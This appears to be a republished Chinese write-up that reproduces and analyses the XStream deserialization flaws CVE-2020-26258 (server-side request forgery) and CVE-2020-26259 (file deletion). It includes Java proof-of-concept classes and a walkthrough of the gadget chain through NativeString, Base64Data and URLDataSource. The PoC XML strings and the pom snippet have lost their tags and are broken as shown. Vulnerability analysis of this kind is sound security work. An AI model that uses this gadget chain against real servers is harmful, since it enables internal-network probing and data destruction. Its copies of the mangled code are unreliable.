千家信息网

XStream反序列化漏洞CVE-2020-26258及26259的复现与分析是怎样的

发表于:2024-10-26 作者:千家信息网编辑
千家信息网最后更新 2024年10月26日,XStream反序列化漏洞CVE-2020-26258及26259的复现与分析是怎样的,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。Xs
千家信息网最后更新 2024年10月26日XStream反序列化漏洞CVE-2020-26258及26259的复现与分析是怎样的

XStream反序列化漏洞CVE-2020-26258及26259的复现与分析是怎样的,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。

Xstream 是 Java 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象。XStream 是一款开源软件,允许在 BSD 许可证的许可下分发。

0x01 漏洞描述

Xstream上次对CVE-2020-26217处理并不彻底,虽然通过黑名单方法阻止了远程代码执行,但是仍然可以采用类似思路实现文件删除与服务器请求伪造。

影响版本

Xstream < = 1.4.14

修复版本

Xstream > = 1.4.15

风险等级

严重

0x02 PoC

CVE-2020-26258的 PoC 如下:

import com.thoughtworks.xstream.XStream;/*CVE-2020-26258: A Server-Side Forgery Request can be activated unmarshallingwith XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host.All versions until and including version 1.4.14https://x-stream.github.io/CVE-2020-26258.htmlSecurity framework of XStream not explicitly initialized, using predefined black list on your own risk.*/public class CVE_2020_26258 {public static void main(String[] args) {String ssrf_xml = "\n" +"  \n" +"    \n" +"      0\n" +"      \n" +"        \n" +"          \n" +"            http://localhost:8989/internal/:\n" +"          \n" +"          \n" +"        \n" +"        0\n" +"      \n" +"    \n" +"    test\n" +"  \n" +"";XStream xstream = new XStream();xstream.fromXML(ssrf_xml);}}

CVE-2020-26259 的 PoC 如下:

import com.thoughtworks.xstream.XStream;/*CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local hostwhen unmarshalling as long as the executing process has sufficient rights.https://x-stream.github.io/CVE-2020-26259.htmlSecurity framework of XStream not explicitly initialized, using predefined black list on your own risk.*/public class CVE_2020_26259 {public static void main(String[] args) {String xml_poc = "\n" +"  \n" +"    \n" +"      0\n" +"      \n" +"        \n" +"          \n" +"            text/plain\n" +"            \n" +"              /tmp/CVE-2020-26259\n" +"            \n" +"          \n" +"          \n" +"        \n" +"        0\n" +"      \n" +"    \n" +"    test\n" +"  \n" +"";XStream xstream = new XStream();xstream.fromXML(xml_poc);}}

0x03 漏洞详情

复现流程

环境

idea 构建maven工程,使用上述 PoC,pom文件为:

4.0.0111.0-SNAPSHOTcom.thoughtworks.xstreamxstream1.4.14

直接运行即可。

复现

  • CVE-2020-26258

使用 flask 开一个临时服务

运行 PoC 收到请求

  • CVE-2020-26259

运行 PoC 前:

运行 PoC 后:

漏洞分析

这两个漏洞基本类似上次的CVE-2020-26217,主要是利用 Xstream 在反序列化map 对象时会检查是否存在 entry:如果存在,那么在构建这个 entry 的过程中,会调用 entry 的hashCode 函数。CVE-2020-26217与本次两个都是使用到了jdk.nashorn.internal.objects.NativeString 的 hashCode函数。

调试分析

使用 xstream 的 fromXml 进行反序列化:

跟进到 putCurrentEntryIntoMap,在 Xstream 构建 entry 的过程中,将本次的key 值即我们提供的 NativeString, put 到 map中:

put 过程会进行一步 hash 操作:

在 hash 里调用了key 的 hashCode 函数,即我们输入的jdk.nashorn.internal.objects.NativeString 的 hashCode 函数。

NativeString 的 hashCode 函数调用 getStringValue,进而调用其 value 的toString 函数,而这个value则是我们提供的com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data。

Base64Data 的 toString 调用了其 get。

目前为止,这两个漏洞与CVE-2020-26217一致。CVE-2020-26217 利用的是readFrom 及其后续,不过因为 Xstream 黑名单限制了进行远程代码执行,这里利用 getInputStream 与 close 进行 ssrf 和文件删除。

InputStream is = this.dataHandler.getDataSource().getInputStream();是触发ssrf的地方,使用 javax.activation.URLDataSource 的 getInputStream 函数:

URLDataSource 的 getInputStream 函数就是访问传入的 url。

文件删除则是在 ReadAllStream 的 close里进行的。

修复分析

添加黑名单。

看完上述内容,你们掌握XStream反序列化漏洞CVE-2020-26258及26259的复现与分析是怎样的的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注行业资讯频道,感谢各位的阅读!

0